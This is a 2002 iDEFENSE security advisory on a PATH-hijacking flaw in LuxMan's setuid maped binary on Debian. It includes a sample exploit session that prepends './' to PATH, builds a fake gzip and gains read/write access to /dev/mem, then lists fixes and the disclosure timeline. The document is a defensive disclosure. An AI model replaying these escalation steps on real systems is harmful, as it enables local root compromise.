-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 iDEFENSE Security Advisory 11.06.02: http://www.idefense.com/advisory/11.06.02.txt Non-Explicit Path Vulnerability in LuxMan November 6, 2002 I. BACKGROUND Frank McIngvale's LuxMan is a Linux-based game similar to Pac Man. More information about it is available at http://packages.debian.org/stable/games/luxman.html. II. DESCRIPTION Maped is a setuid binary that belongs to LuxMan. It executes gzip without using the full path. A local attacker can create an exploit binary named gzip and have maped execute it by properly modifying the path environment variable. The following is a sample run and explanation of an exploit that will duplicate /dev/mem to /tmp/mem: First, the attacker sets the current working directory into the path environment variable: farmer@debian30:~$ export | grep PATH declare -x PATH="/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games" farmer@debian30:~$ declare -x PATH="./:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games" farmer@debian30:~$ export | grep PATH declare -x PATH="./:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games" Second, the attacker compiles the exploit as a binary named gzip and creates a fake archive: farmer@debian30:~$ cc gzip.c -o gzip farmer@debian30:~$ touch test.gz Third, the attacker executes the maped binary: farmer@debian30:~$ `which maped` test.gz You must be the owner of the current console to use svgalib. Not running in a graphics capable console, and unable to find one. Using VGA driver. svgalib 1.4.3 ... At this point, /dev/mem is being duplicated into /dev/tmp. The descriptor to /dev/mem can be analyzed in a separate terminal: farmer@debian30:~$ lsof | grep /dev/mem gzip 5197 farmer 5u CHR 1,1 178294 /dev/mem farmer@debian30:~$ cd /proc/5197/fd/ farmer@debian30:~$ ls -l total 0 lrwx------ 1 farmer farmer 64 Oct 10 05:56 0 -> /dev/pts/1 l-wx------ 1 farmer farmer 64 Oct 10 05:56 1 -> pipe:[4991] lrwx------ 1 farmer farmer 64 Oct 10 05:56 2 -> /dev/pts/1 lrwx------ 1 farmer farmer 64 Oct 10 05:56 3 -> /tmp/mem lr-x------ 1 farmer farmer 64 Oct 10 05:56 4 -> /dev/zero lrwx------ 1 farmer farmer 64 Oct 10 05:56 5 -> /dev/mem It is clear that descriptor 5 is a read write descriptor to /dev/mem. III. ANALYSIS Any local user can launch this attack to gain read/write access to /dev/mem. Such access can lead to local root compromise. Exploitation is possible by scanning the file for fragments of the master password file and modifying kernel memory to re-map system calls. IV. DETECTION LuxMan 0.41, which is packaged and distributed with Debian Linux 3.0r0, is vulnerable. It is probable that the same LuxMan version is vulnerable on other platforms as well. V. WORKAROUND Customers should consider one of the two following options: Option 1: Remove the LuxMan package by issuing the command "# apt-get remove luxman". Option 2: Remove the setuid bit from the maped binary by executing the command "# chmod -s `which maped`". VI. VENDOR RESPONSE The Debian Project has made available an updated LuxMan package that fixes this vulnerability. More information should be available in DSA-189 at http://www.debian.org/security/2002/dsa-189 . VII. CVE INFORMATION The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project assigned the identification number CAN-2002-1245 to this issue. VIII. DISCLOSURE TIMELINE 10/03/2002 Issue disclosed to iDEFENSE 10/31/2002 Maintainer, Janos Lenart (ocsi@debian.org), and security@debian.org notified 10/31/2002 iDEFENSE clients notified 11/02/2002 Responses received from ocsi@debian.org and Martin Schulze (joey@infodrom.org) 11/06/2002 Public disclosure IX. CREDIT Texonet (http://www.texonet.com) discovered this vulnerability. Get paid for security research http://www.idefense.com/contributor.html Subscribe to iDEFENSE Advisories: send email to listserv@idefense.com, subject line: "subscribe" About iDEFENSE: iDEFENSE is a global security intelligence company that proactively monitors sources throughout the world — from technical vulnerabilities and hacker profiling to the global spread of viruses and other malicious code. Our security intelligence services provide decision-makers, frontline security professionals and network administrators with timely access to actionable intelligence and decision support on cyber-related threats. For more information, visit http://www.idefense.com. - -dave David Endler, CISSP Director, Technical Intelligence iDEFENSE, Inc. 14151 Newbrook Drive Suite 100 Chantilly, VA 20151 voice: 703-344-2632 fax: 703-961-1071 dendler@idefense.com www.idefense.com -----BEGIN PGP SIGNATURE----- Version: PGP 7.1.2 Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A iQA/AwUBPclF1UrdNYRLCswqEQLR5ACgyXFDjuXKXSkUb7pa4GGMEk+3GGsAn0Hf feitp98Q3xxQr1bg1oMwIUBs =WLLe -----END PGP SIGNATURE-----
